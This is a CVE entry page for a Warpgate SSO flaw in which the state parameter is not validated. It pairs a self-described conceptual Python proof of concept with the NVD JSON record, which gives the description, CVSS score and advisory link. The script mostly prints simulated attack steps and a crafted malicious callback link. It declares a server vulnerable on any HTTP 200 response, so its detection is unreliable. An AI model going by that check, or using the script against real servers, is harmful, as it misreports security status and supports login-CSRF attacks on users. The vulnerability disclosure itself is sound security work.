CVE-2026-44347

import requests # This is a conceptual Proof of Concept (PoC) to demonstrate the SSO state bypass logic. # It simulates an attacker initiating a flow and tricking a victim into completing it. TARGET_URL = "https://warpgate.example.com" def exploit_sso_state_bypass(): print("[*] Step 1: Attacker initiates SSO login flow...") # In a vulnerable version, the system might not bind the state to the session securely. session = requests.Session() # Simulate getting the SSO authorization URL start_resp = session.get(f"{TARGET_URL}/@warpgate/api/sso/login/start") if start_resp.status_code == 200: print("[!] Vulnerability detected: State parameter validation is missing or weak.") # Step 2: Attacker constructs a malicious link # The victim is tricked into clicking this link and logging in. # Since 'state' is not validated properly, the victim's auth code is processed # in the context of the attacker's session. malicious_callback_url = f"{TARGET_URL}/@warpgate/api/sso/callback?code=VICTIM_AUTH_CODE&state=INVALID_OR_MISSING_STATE" print(f"[*] Step 2: Attacker sends malicious link to victim: {malicious_callback_url}") # Step 3: Victim completes authentication (simulated) print("[*] Step 3: Victim logs in...") # Step 4: Attacker gains access to victim's actions within the attacker's account context print("[*] Step 4: Vulnerability exploited. Victim is logged into attacker's account context.") print("[*] Attacker can now capture data written by the victim.") else: print("[-] Target is not responding or not vulnerable.") if __name__ == "__main__": exploit_sso_state_bypass()

{"cve": {"id": "CVE-2026-44347", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:18.340", "lastModified": "2026-05-12T23:16:18.340", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Warpgate is an open source SSH, HTTPS and MySQL bastion host for Linux. Prior to 0.23.3, the SSO flow does not validate the state parameter, which makes it possible for an attacker to trick a user into logging into the attacker's account, possibly convincing them to perform sensitive actions on the attacker's account (such as writing sensitive data to the attacker's SSH target, or logging into an HTTP target that the attacker set up). This vulnerability is fixed in 0.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://github.com/warp-tech/warpgate/security/advisories/GHSA-rj86-hm3r-c275", "source": "[email protected]"}]}}